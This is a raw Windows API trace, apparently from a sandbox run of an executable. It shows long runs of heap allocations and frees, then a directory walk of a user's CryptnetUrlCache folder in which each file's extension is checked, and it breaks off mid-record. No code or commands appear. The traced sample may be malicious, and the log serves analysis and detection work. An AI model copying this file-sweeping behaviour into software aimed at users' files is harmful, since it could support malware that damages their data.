[0196.548] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.548] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.549] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.549] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.549] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.549] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.550] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.550] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.550] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.550] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.551] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.551] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.551] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.551] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.552] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.552] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.552] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.552] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.553] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.553] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.553] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.553] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.554] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.554] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.554] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.554] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.555] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.556] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.556] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.556] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.556] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.556] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0196.557] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.557] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0196.558] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.558] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.558] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.559] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.559] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0196.560] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.560] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.560] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.560] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0196.560] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.561] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.561] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.561] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.561] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.561] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.561] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.561] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.562] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.562] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.562] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.562] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.562] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0196.563] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.563] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0196.563] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.565] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.565] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.567] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.567] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.568] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.568] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.568] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.569] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.569] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.569] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.571] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.571] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.571] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.571] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.571] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.571] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.571] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.571] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0196.572] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.572] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0196.572] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.572] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.572] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.573] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.573] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0196.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.574] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.574] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0196.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.575] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.575] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.575] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.575] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.575] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.575] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.576] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.576] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.576] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.576] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.576] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0196.576] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.577] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0196.577] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.577] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.577] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.577] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.577] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.578] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.578] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.579] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.579] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.579] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.579] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.581] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.581] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.581] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.582] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.582] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.582] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.582] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.582] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\") returned="Content\\" [0196.582] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0196.582] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea920 [0196.583] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0196.583] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\") returned="CryptnetUrlCache\\" [0196.583] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0196.583] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0196.583] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0196.583] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea920 | out: hHeap=0x6a0000) returned 1 [0196.583] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0196.583] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0196.584] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0196.584] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\") returned="LocalLow\\" [0196.584] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2cf20 [0196.584] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\") returned="AppData\\" [0196.584] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0196.584] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0196.584] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0196.584] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0196.584] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0196.584] PathFindFileNameW (pszPath="") returned="" [0196.584] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2ed50 [0196.584] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796723b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xbf572320, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xbf572320, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa90 [0196.587] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796723b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xbf572320, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xbf572320, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0196.587] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x5d876470, ftCreationTime.dwHighDateTime=0x1d706ad, ftLastAccessTime.dwLowDateTime=0x5d876470, ftLastAccessTime.dwHighDateTime=0x1d706ad, ftLastWriteTime.dwLowDateTime=0x5d876470, ftLastWriteTime.dwHighDateTime=0x1d706ad, nFileSizeHigh=0x0, nFileSizeLow=0x209, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3130B1871A126520A8C47861EFE3ED4D", cAlternateFileName="3130B1~1")) returned 1 [0196.587] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.587] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xd6) returned 0x762d70 [0196.588] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3130B1871A126520A8C47861EFE3ED4D") returned="" [0196.588] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xab8c1ed0, ftCreationTime.dwHighDateTime=0x1d706ae, ftLastAccessTime.dwLowDateTime=0xab8c1ed0, ftLastAccessTime.dwHighDateTime=0x1d706ae, ftLastWriteTime.dwLowDateTime=0xab8c1ed0, ftLastWriteTime.dwHighDateTime=0x1d706ae, nFileSizeHigh=0x0, nFileSizeLow=0x475, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="37C951188967C8EB88D99893D9D191FE", cAlternateFileName="37C951~1")) returned 1 [0196.588] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0196.588] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xd6) returned 0x762d70 [0196.588] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\37C951188967C8EB88D99893D9D191FE") returned="" [0196.588] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x1aa3080, ftCreationTime.dwHighDateTime=0x1d706ab, ftLastAccessTime.dwLowDateTime=0x1aa3080, ftLastAccessTime.dwHighDateTime=0x1d706ab, ftLastWriteTime.dwLowDateTime=0xacdd5700, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x12d1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", cAlternateFileName="57C8ED~1")) returned 1 [0196.588] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157") returned="" [0196.588] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x794f7e10, ftCreationTime.dwHighDateTime=0x1d706ab, ftLastAccessTime.dwLowDateTime=0x794f7e10, ftLastAccessTime.dwHighDateTime=0x1d706ab, ftLastWriteTime.dwLowDateTime=0xacf2c360, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x2ff, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="696F3DE637E6DE85B458996D49D759AD", cAlternateFileName="696F3D~1")) returned 1 [0196.588] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\696F3DE637E6DE85B458996D49D759AD") returned="" [0196.588] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x7c71ad70, ftCreationTime.dwHighDateTime=0x1d706ab, ftLastAccessTime.dwLowDateTime=0x7c71ad70, ftLastAccessTime.dwHighDateTime=0x1d706ab, ftLastWriteTime.dwLowDateTime=0x7c71ad70, ftLastWriteTime.dwHighDateTime=0x1d706ab, nFileSizeHigh=0x0, nFileSizeLow=0x234, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7396C420A8E1BC1DA97F1AF0D10BAD21", cAlternateFileName="7396C4~1")) returned 1 [0196.588] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7396C420A8E1BC1DA97F1AF0D10BAD21") returned="" [0196.588] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x4eb51c0, ftCreationTime.dwHighDateTime=0x1d706ab, ftLastAccessTime.dwLowDateTime=0x4eb51c0, ftLastAccessTime.dwHighDateTime=0x1d706ab, ftLastWriteTime.dwLowDateTime=0x6a399090, ftLastWriteTime.dwHighDateTime=0x1d706ac, nFileSizeHigh=0x0, nFileSizeLow=0xe6fe, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="77EC63BDA74BD0D0E0426DC8F8008506", cAlternateFileName="77EC63~1")) returned 1 [0196.588] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506") returned="" [0196.588] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x4e42da0, 